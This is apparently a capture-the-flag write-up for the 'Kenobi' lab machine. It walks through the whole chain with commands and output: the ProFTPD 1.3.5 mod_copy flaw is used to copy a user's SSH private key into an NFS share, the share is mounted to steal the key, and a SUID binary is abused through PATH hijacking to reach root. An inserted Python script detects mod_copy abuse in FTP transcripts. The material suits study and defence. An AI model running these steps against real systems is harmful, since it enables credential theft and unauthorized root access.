
Kenobi

ProFTPD

ProFTPD Version: 1.3.5 [Vulnerability: MOD_COPY Module]

Since we know that the user kenobi uses SSH, we can copy his private key into the NFS-shared directory using the MOD_COPY module vulnerability. After that, we can mount the share and read the private SSH key.


  • The NFS share exports /var
  • The /var directory contains a tmp directory, so we can copy the private SSH key to that location
attacker@machine:~$ showmount -e 10.10.118.63
Export list for 10.10.118.63:
/var *

  • We can Connect using Netcat
  • Copying the Private SSH Key into the NFS Share:
attacker@machine:~$ nc 10.10.118.63 21 
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.118.63]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
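
From the defender's side, the exchange above has a clear signature: a SITE CPFR / SITE CPTO pair that completes without a preceding 230 login reply. The following is an added example, not part of the original writeup, that scans an FTP control-channel transcript for such copies; the function name, the SENSITIVE watch-list and the sample transcript are assumptions constructed for illustration.

```python
import re

# Assumed watch-list of path fragments; tune for your own hosts.
SENSITIVE = ("/.ssh/", "/etc/shadow", "/etc/passwd")
REPLY = re.compile(r"^(\d{3})[ -]")                           # server reply line
SITE_COPY = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(.+)$", re.I)  # mod_copy verbs

# Constructed sample, modelled on the session shown above.
SAMPLE = """\
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.0.2.10]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
"""


def find_mod_copy_abuse(transcript):
    """Return one finding per completed SITE CPFR/CPTO copy in an FTP
    control-channel transcript (client commands and server replies)."""
    authed, src, pending, findings = False, None, None, []
    for line in (l.strip() for l in transcript.splitlines()):
        reply = REPLY.match(line)
        if reply:
            code = reply.group(1)
            if code == "230":                      # login succeeded
                authed = True
            elif pending and pending[0] == "CPFR":
                # 350 means the server accepted the copy source
                src = pending[1] if code == "350" else None
            elif pending and pending[0] == "CPTO":
                if code == "250" and src is not None:   # copy completed
                    findings.append({
                        "src": src,
                        "dst": pending[1],
                        "authenticated": authed,
                        "sensitive": any(s in src for s in SENSITIVE),
                    })
                src = None
            pending = None
            continue
        cmd = SITE_COPY.match(line)
        pending = (cmd.group(1).upper(), cmd.group(2).strip()) if cmd else None
    return findings


if __name__ == "__main__":
    for hit in find_mod_copy_abuse(SAMPLE):
        print(hit)
```

A finding with "authenticated" set to False means the server honoured the copy commands before login; unloading mod_copy or upgrading ProFTPD removes that path.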

NFS

  • Mounting the NFS Shared Directory
attacker@machine:~$ mkdir NFS
attacker@machine:~$ mount -t nfs 10.10.118.63:/var NFS -o nolock
  • Copying the Contents of id_rsa File
attacker@machine:~$ ls NFS
drwxr-xr-x 2 root root 4096 4 set 2019 backups
drwxr-xr-x 9 root root 4096 4 set 2019 cache
drwxrwxrwt 2 root root 4096 4 set 2019 crash
drwxr-xr-x 40 root root 4096 4 set 2019 lib
drwxrwsr-x 2 root games 4096 12 apr 2016 local
lrwxrwxrwx 1 root root 9 4 set 2019 lock -> /run/lock
drwxrwxr-x 10 root 4096 4 set 2019 log
drwxrwsr-x 2 root mem 4096 27 feb 2019 mail
drwxr-xr-x 2 root root 4096 27 feb 2019 opt
lrwxrwxrwx 1 root root 4 4 set 2019 run -> /run
drwxr-xr-x 2 root root 4096 30 gen 2019 snap
drwxr-xr-x 5 root root 4096 4 set 2019 spool
drwxrwxrwt 6 root root 4096 7 ott 08.36 tmp
drwxr-xr-x 3 root root 4096 4 set 2019 www
attacker@machine:~$ ls NFS/tmp
-rw-r--r-- 1 virtualbox virtualbox 1675 12 mag 02.44 id_rsa
attacker@machine:~$ cp NFS/tmp/id_rsa ~

  • Assigning the correct permissions to id_rsa
attacker@machine:~$ chmod 600 id_rsa


Privilege Escalation

  • We can log in using the private SSH key
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

  • The /usr/bin/menu Binary has the SUID Bit Set.
kenobi@kenobi:~$ find / -type f -perm -04000 -ls 2>/dev/null
...
280011 12 -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
...

  • The binary runs the system commands curl, uname and ifconfig without full paths, so we can escalate our privileges using PATH variable manipulation.
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo "/bin/bash" > ifconfig && chmod 4777 ifconfig
kenobi@kenobi:/tmp$ /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3

root@kenobi:/tmp$ id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
root@kenobi:/tmp$ whoami
root